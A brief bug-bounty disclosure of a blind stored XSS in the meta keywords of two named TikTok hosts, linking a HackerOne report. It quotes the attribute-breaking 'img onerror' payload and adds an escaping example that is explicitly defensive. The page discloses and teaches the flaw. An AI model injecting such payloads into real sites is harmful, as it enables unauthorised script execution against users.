Blind Stored XSS on 2 TikTok Assets

<meta name='keywords' content='["><img src=x onerror=alert()>], TikTok, TokTok Shop' />

'><img src=x onerror=alert()>

<meta name='keywords' content='['><img src=x onerror=alert()>], TikTok, TokTok Shop' />
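The meta tag above shows a keyword value ending the `content` attribute early. The following is an added example, not code from the original post or from the affected service: it assumes the tag is built by string concatenation (the post does not say how), and all function names are hypothetical. It compares an unescaped renderer with one that encodes both quote styles, and checks what an HTML parser would read back as the attribute value.

```javascript
// Unsafe (assumed pattern): keywords go into a single-quoted attribute as-is.
function renderKeywordsUnsafe(keywords) {
  return "<meta name='keywords' content='" + keywords.join(", ") + "' />";
}

const ATTR_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode every character that can end an attribute value or start markup.
// Both quote styles are covered so the template's delimiter choice does not matter.
function escapeAttr(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ATTR_ESCAPES[ch]);
}

function renderKeywordsSafe(keywords) {
  return "<meta name='keywords' content='" + keywords.map(escapeAttr).join(", ") + "' />";
}

// Read the content attribute the way an HTML parser does: the value runs from
// the opening quote to the next identical quote, then references are decoded.
function parsedContent(tag) {
  const start = tag.indexOf("content=") + "content=".length;
  const quote = tag[start];
  const end = tag.indexOf(quote, start + 1);
  return tag.slice(start + 1, end)
    .replace(/&lt;/g, "<").replace(/&gt;/g, ">")
    .replace(/&quot;/g, '"').replace(/&#39;/g, "'")
    .replace(/&amp;/g, "&"); // decoded last so "&amp;lt;" is not decoded twice
}

// True when the parser sees exactly the intended keyword list as the value,
// i.e. nothing in the input terminated the attribute early.
function staysInAttribute(render, keywords) {
  return parsedContent(render(keywords)) === keywords.join(", ");
}

// Constructed inputs modelled on the two strings quoted on this page.
const singleQuoted = ["'><img src=x onerror=alert()>", "TikTok"];
const doubleQuoted = ['"><img src=x onerror=alert()>', "TikTok"];

for (const [label, input] of [["single", singleQuoted], ["double", doubleQuoted]]) {
  console.log(label, "unsafe:", staysInAttribute(renderKeywordsUnsafe, input),
    "safe:", staysInAttribute(renderKeywordsSafe, input));
}
```

Only the quote that matches the attribute delimiter ends the value in the unescaped renderer, which is why an encoder that handles one quote style alone is not sufficient for templates that mix delimiters.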

Report:

https://hackerone.com/reports/1554048

Affected Assets:

https://oec-api.tiktokv.com/

https://shop.tiktok.com/
